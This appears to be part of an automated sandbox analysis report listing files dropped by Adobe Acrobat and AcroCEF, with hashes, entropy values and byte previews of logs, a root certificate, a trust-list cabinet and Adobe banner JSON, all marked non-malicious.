                                                                        SSDEEP:6:DymkFmq2PCHhJ2nKuAl9OmbzNMxIFUt8Wym7oXZmw+Wym+O0kwOCHhJ2nKuAl9Ob:X1vBHAa8jFUt8gUX/+g+O056HAa84J
                                                                        MD5:178EDA9B08FD83DD366A765A7D7AAB06
                                                                        SHA1:D06192DB1A720623742ED0E9E8B2720E08ADF19B
                                                                        SHA-256:B78BCECA29C2BE0D87A5D1536F96BA32219DE592053FED9E78D79B4AB6739EF5
                                                                        SHA-512:E3B9F2C39EE602D676516D7035185967EBE190ED7493C008A2C497616F6886A4E42B115B47FF552053FDFCF30F2614804FF90D47E01D2806682C0AA629248184
                                                                        Malicious:false
                                                                        Preview:2024/12/27-03:05:25.478 1da4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/27-03:05:25.485 1da4 Recovering log #3.2024/12/27-03:05:25.490 1da4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:PC bitmap, Windows 3.x format, 114 x -152 x 32, cbSize 69366, bits offset 54
                                                                        Category:dropped
                                                                        Size (bytes):69366
                                                                        Entropy (8bit):4.204910253269834
                                                                        Encrypted:false
                                                                        SSDEEP:768:4zt4+AlK+eorMFGWA30zBQED5mAG23BjHzbyPbC3UYGmWDf3cQHhhXNezmZ5GW7n:VXr+uED5mw3BjHzujComW3ZzZ5HFrsQ
                                                                        MD5:D50A539BB2E1D8B6A4598E2A639175D5
                                                                        SHA1:30A99829736A6B8A6E7F20E47BA37CCFD90F1CD0
                                                                        SHA-256:8FF4DB4C5ED4FF7CCB9FE3CB50C17105DA1F5F9EE557E2333DF1A7CBD23802DE
                                                                        SHA-512:2D3BDE6DC27F20C8F40BE5C9C7351D3A83D6A5DEE68D21AED77F5322D561F8843292498876F4B03E8774C1EA17E46485AC4C53E3074AA74AA6A652C95271EB95
                                                                        Malicious:false
                                                                        Preview:BM........6...(...r...h..... .....................................................................................................................................................................................................................................................................................................................................................................................mdl.ohn..............|..ohp.............yM..yN..........yM..{R..........UKT.2&0.D8A.............<08.I>F................................................................................................................................................................................................................................................................................................................................................................e[d.e\d.e\d.........f\d.e\e.f\d.....sD..sD..sD..uG......sD..rD..sD......E:C.&.$.&.$.*.).....(.%.&.%.'.$.?3=...................................
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:Certificate, Version=3
                                                                        Category:dropped
                                                                        Size (bytes):1391
                                                                        Entropy (8bit):7.705940075877404
                                                                        Encrypted:false
                                                                        SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                        MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                        SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                        SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                        SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                        Malicious:false
                                                                        Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                        Category:dropped
                                                                        Size (bytes):71954
                                                                        Entropy (8bit):7.996617769952133
                                                                        Encrypted:true
                                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                        Malicious:false
                                                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):192
                                                                        Entropy (8bit):2.723752989961514
                                                                        Encrypted:false
                                                                        SSDEEP:3:kkFklQzh+EttfllXlE/HT8kHvNNX8RolJuRdxLlGB9lQRYwpDdt:kKJzh+EteT82NMa8RdWBwRd
                                                                        MD5:255D771EAC7917168171500C38BC305C
                                                                        SHA1:52C2ED35CFCFD0F4622CC1283ABE89F622F19F1E
                                                                        SHA-256:A7D93E995AB4FC3AB33F5CF6DB79D3AC437D303CAD422EC153635AF4BF9E4E4D
                                                                        SHA-512:BBE2BA386A25852E8E44571BDE2BA6530B0C19CE41C14A8948B7BFCE82623EDD704D8DA4489E3D6D5348B961290A61BA01A33F261AA92B2EC5B5195EFD46190C
                                                                        Malicious:false
                                                                        Preview:p...... ........c...6X..(....................................................... ..........W....u...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                        File Type:data
                                                                        Category:modified
                                                                        Size (bytes):328
                                                                        Entropy (8bit):3.2335992211078866
                                                                        Encrypted:false
                                                                        SSDEEP:6:kKlL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:sDImsLNkPlE99SNxAhUe/3
                                                                        MD5:E561BC4FBECAB13826360E9905C530E5
                                                                        SHA1:2A051DDD9891A8223D45AAEE466C8C31B0E22997
                                                                        SHA-256:480E3A281CD4FBB2F85F1797E283CDC84F78973B3B68E14CD70703DA27CA3417
                                                                        SHA-512:23C4A90A6ED4CF7CBF817C46B99EA750B1A4C449EAE995E41769D7DA6C242CB62F85B42060318845614F99F2E593781ADBB6A8A9ABADCA96A476DD31DE50AA6D
                                                                        Malicious:false
                                                                        Preview:p...... ........$../6X..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):295
                                                                        Entropy (8bit):5.3666757084134
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HX7DTJPKvB3/dVlPIHAR0YvFUuqoAvJM3g98kUwPeUkwRe9:YvXKX7PJSvR/ZwHAz9GMbLUkee9
                                                                        MD5:FC4C2513B44CB5DB51BD59D6279003C0
                                                                        SHA1:9E31A8DE5DFDA3772D69117A1AF8F7AEB2E965F1
                                                                        SHA-256:A2CA77068B4729DD8D5163856BD09AB2A04F802ADBF5128B9F2E06694262F26B
                                                                        SHA-512:43BE3009180E0324F6B8DA9257A93F7F76456EF075DAE46CA7B71CD18619935DA725B117E65684E38D89C48CE2E05BA3B8BB14909EDF3C196E6DE30D9C8E1F8B
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):294
                                                                        Entropy (8bit):5.302189309078057
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HX7DTJPKvB3/dVlPIHAR0YvFUuqoAvJfBoTfXpnrPeUkwRe9:YvXKX7PJSvR/ZwHAz9GWTfXcUkee9
                                                                        MD5:91DDA120A2F19EC522B0E8C44083C4E6
                                                                        SHA1:E3411E82157DEAF46F4EE8FC98B8602E8FE67D5F
                                                                        SHA-256:DF2B11A556EEDDEB11D1CC52D733A37276240CAE2A7A21882011E60702E0E8B9
                                                                        SHA-512:933762A77B154E98D464BF9EE744D34D54E8F838B71BEB1931C3ABBACD8976518CFBB3353F6116D9535E7AEAE5DDD051110D97169FABB6FD07C8357D685D0961
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):294
                                                                        Entropy (8bit):5.2800394026551265
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HX7DTJPKvB3/dVlPIHAR0YvFUuqoAvJfBD2G6UpnrPeUkwRe9:YvXKX7PJSvR/ZwHAz9GR22cUkee9
                                                                        MD5:C9AC3518D7628623F6ADE7FBEE9A4390
                                                                        SHA1:AFF3EE21221293E7ED375DF17CA31802DAC424B0
                                                                        SHA-256:E2816C91418AD455A0B66C1E9E1E6AAB41C39D65CC9987168436FE6C7032DADD
                                                                        SHA-512:1AAC08CC8D7D547546FB5CDDEEEA4169AEABB7EED0D4ADAB644563D2673C98B0FD394CC8639074ED411D5F5B6A1B27A90888865AF779152E21520CD75F7C3661
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):285
                                                                        Entropy (8bit):5.343740476786632
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HX7DTJPKvB3/dVlPIHAR0YvFUuqoAvJfPmwrPeUkwRe9:YvXKX7PJSvR/ZwHAz9GH56Ukee9
                                                                        MD5:3402F9C7D36FA3DABCC43024721914B0
                                                                        SHA1:7820DF05793B7E08473853A3A430778EC643AF6B
                                                                        SHA-256:C068D69DFA3DF7EFFEDD6EF538B8C6856C68E862FC2DD605B588E6FEBEB8B5A2
                                                                        SHA-512:CC373CAE0179367315384FDD1B6D45779B74CBBE584871C92CB7EF7380434B5D31AF4FA99AE41F2A2991234E95C8B9611D884386A1AEDA6ABC623A12DAB2E704
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):1123
                                                                        Entropy (8bit):5.690349851644639
                                                                        Encrypted:false
                                                                        SSDEEP:24:Yv6X7PIJhqpLgE9cQx8LennAvzBvkn0RCmK8czOCCSO:YvkIJhqhgy6SAFv5Ah8cv/O
                                                                        MD5:38E36501F7C6A722F3EA183FD0A6F770
                                                                        SHA1:665CE2410275B756EED8AE64AEB38767DCF06DE1
                                                                        SHA-256:5876E53D198312ED36B00AEEDA61D0C71D05EB4E31CF1F26B01D1A7B4A20D9E9
                                                                        SHA-512:08F4EF40A7F034D061EF630E96DD41FD0F875F3C50100D77C20DA3A7CB9E6313153F2C5087C9A256888F4215253CD0C59CAA2B7FA8261670719FCF2B27D7860B
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):289
                                                                        Entropy (8bit):5.292913311935147
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HX7DTJPKvB3/dVlPIHAR0YvFUuqoAvJf8dPeUkwRe9:YvXKX7PJSvR/ZwHAz9GU8Ukee9
                                                                        MD5:8321E27678AA0D50EFE50ADB14D51834
                                                                        SHA1:BE8B1EDF721C3EC1DAE4778938F102BFEC940461
                                                                        SHA-256:52CD9FACFDF12F2E35D7EE1CCAD8EE7B94A0970B1438949786B310EAF2DC0BAF
                                                                        SHA-512:9144175CBAA431D6D588847754EF3486F99C778456F4CC26EFF4D4C4B2C3ECB2367689D90FD332FDDF3908C2693C4F3624121A8E3796FBEA02572C8ED4E863A6
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):292
                                                                        Entropy (8bit):5.2910264637830196
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HX7DTJPKvB3/dVlPIHAR0YvFUuqoAvJfQ1rPeUkwRe9:YvXKX7PJSvR/ZwHAz9GY16Ukee9
                                                                        MD5:2AE99F5CD1AA3D99135DD433F72FA093
                                                                        SHA1:1C60213597251F0FD000D050B850F7B171A9BE6E
                                                                        SHA-256:A4C5284B3AC3519E2B69F20E651F30ED2383D75759B2C77E155744CE377DBEFE
                                                                        SHA-512:6BCF9A53DDFF2891E3B5DFA221D63B4C439E61FDD61258E2E1FA7A1163ABCF91A3DD9C5DDB3DD13373B5D114772BA03E5D620E9D53AE416326272F8EA9AA7EAB
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):289
                                                                        Entropy (8bit):5.30783533589309
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HX7DTJPKvB3/dVlPIHAR0YvFUuqoAvJfFldPeUkwRe9:YvXKX7PJSvR/ZwHAz9Gz8Ukee9
                                                                        MD5:03A9888A8AE78F9624E932C4166CD204
                                                                        SHA1:1296FE1855BD45C686272822314BC16A20319D3C
                                                                        SHA-256:07557CDE74BE40A2B19A5E74DE679B99923625D00377272C29A5CCB4C2B97259
                                                                        SHA-512:17287CD7B42B8C41BB34EC316C27E20D5837E22C0ED83D182A52734FD7968C12B30EBA9BD07D8DB74B239FC33209EDD5D4850B85E459D8FCECB803A3B6F5AF78
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):295
                                                                        Entropy (8bit):5.322403844735917
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HX7DTJPKvB3/dVlPIHAR0YvFUuqoAvJfzdPeUkwRe9:YvXKX7PJSvR/ZwHAz9Gb8Ukee9
                                                                        MD5:AE04DE4E2BB89E25F8C1C82E88AB202D
                                                                        SHA1:39B4EB9F9EBDDEC91C5BCFE2A539AB324A348AC1
                                                                        SHA-256:31905F139E018C7E01C90302897504350C5CE29576F2AB4CD55177EC1F0FB5A6
                                                                        SHA-512:9053070E3C4446EDFC2FA90051867F90D600BE1344891D95DB4B9348E330F6ED26890471B828C4C7FF82EB5845072B4319BC637CD77E74DBD2080C5D05F23232
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):289
                                                                        Entropy (8bit):5.302504683302236
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HX7DTJPKvB3/dVlPIHAR0YvFUuqoAvJfYdPeUkwRe9:YvXKX7PJSvR/ZwHAz9Gg8Ukee9
                                                                        MD5:28B7DF2BF2FAAF53C5786E1ED9016822
                                                                        SHA1:8CE5D4A8370B3B7D3C2BD108D3EE27D48DDB0F18
                                                                        SHA-256:607DAB96F8BDD5AABB09344CE79C3EED0F75F4BB0705682BDFD8D30A5A9E6368
                                                                        SHA-512:009910CEBBF682A484315D6630DFDE6B1F281555C7666F80B8DDFC373400635B4448278AA3AAFEE1A10F4430A81A14496818279AF9ADD9227518EFA97A6CA7A7
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):284
                                                                        Entropy (8bit):5.288599152662121
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HX7DTJPKvB3/dVlPIHAR0YvFUuqoAvJf+dPeUkwRe9:YvXKX7PJSvR/ZwHAz9G28Ukee9
                                                                        MD5:D820AEAFE903EB037F93EBAA29F6D1EA
                                                                        SHA1:9B2232F9358811168D1D31FA811E3902CA80AE05
                                                                        SHA-256:7902A317A5CAF551898DAF22474788E23C9D858AC60F9B3E0F8ACBC01CC60297
                                                                        SHA-512:BD735D0AF86E9C6287DD70C2448CE38E8FA23738618D9F20CA29082F7D7025C9028018EF59AFD3AD6D6CC70840772F3A117C2887EBF732B58390C51B962009F8
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):291
                                                                        Entropy (8bit):5.28603456665787
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HX7DTJPKvB3/dVlPIHAR0YvFUuqoAvJfbPtdPeUkwRe9:YvXKX7PJSvR/ZwHAz9GDV8Ukee9
                                                                        MD5:D8A1AAD643B71CD726B5D8B0165456C4
                                                                        SHA1:47B73434821A74B3F13CDBF24E90543BB5C8E06F
                                                                        SHA-256:00183BDA5B3C2F09747B3DE18EABABE796A255486B60E8BBFB0AB371E99C5EF2
                                                                        SHA-512:2F10FE2B02D6E8BFD7E66FAF02C2DD5BF44B0204E44619D87DA4E77641619AD9713EB0F68FDE1B8063929574BEEB4C8E4BA7208BDC87E14139851C79654A9B85
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):287
                                                                        Entropy (8bit):5.28446243436575
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HX7DTJPKvB3/dVlPIHAR0YvFUuqoAvJf21rPeUkwRe9:YvXKX7PJSvR/ZwHAz9G+16Ukee9
                                                                        MD5:58F7D3C540AF87964DAE3A036EBBF68F
                                                                        SHA1:3178866B7B425AD8F47583B990DFD56C27309D8B
                                                                        SHA-256:B9AB70DAB4E841FDD49CF53D2BEC33118DFD5B6489EBA4D5A662BFF6C209FD13
                                                                        SHA-512:DA3274759D8EABF74A322A62F499682E858E3F824158D38B00E63B63F17B4C8A3FC55460CA9604EED8D459D2E27B52FF9E96734B6FE2C1EBF84FE068AC443E5A
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):1090
                                                                        Entropy (8bit):5.66437557577195
                                                                        Encrypted:false
                                                                        SSDEEP:24:Yv6X7PIJh2amXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSO:YvkIJh4BgkDMUJUAh8cvMO
                                                                        MD5:D5374561CEB4F77AD63FE61BAAC8E54C
                                                                        SHA1:941A265488EB6E8D1BD2750ACC79CD771CD4B417
                                                                        SHA-256:586253CF88154014A7F993E23F26CE45462852844FB34C0875CFE48721A80ABA
                                                                        SHA-512:20686622969A81EA9E0025B3A02C856F633EDB6FC7D86FF5B1582DF211CC454D93072588C6AECA6B89FDCC63E049044EF58FD158CE41EBC6AB447333B2F1053E
                                                                        Malicious:false
                                                                        Preview:{"analyticsData":{"responseGUID":"534266cc-f60d-4535-9f37-b2fc26d9294e","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735465551573,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):286
                                                                        Entropy (8bit):5.25943012538504
                                                                        Encrypted:false
                                                                        SSDEEP:6:YEQXJ2HX7DTJPKvB3/dVlPIHAR0YvFUuqoAvJfshHHrPeUkwRe9:YvXKX7PJSvR/ZwHAz9GUUUkee9
                                                                        MD5:0E62D631A9B8F2C8592F2ACD55FA4F7D
                                                                        SHA1:097420145FD857DD21195A4334D1D3C9D82C0B94
                                                                        SHA-256:4CE25228F4C252D0413C5B7846A12354A74DE2E832C58E6B15164490C4F25BE2
                                                                        SHA-512:68654A549E1285AF27D37F3A90F3A2A8B46BE557B736585332D36C634D721D3B8459A2BFD2E89DD1963CADC598763FD51AE4E50A54674E5E0C470E546F6A54F8
                                                                        Malicious:false
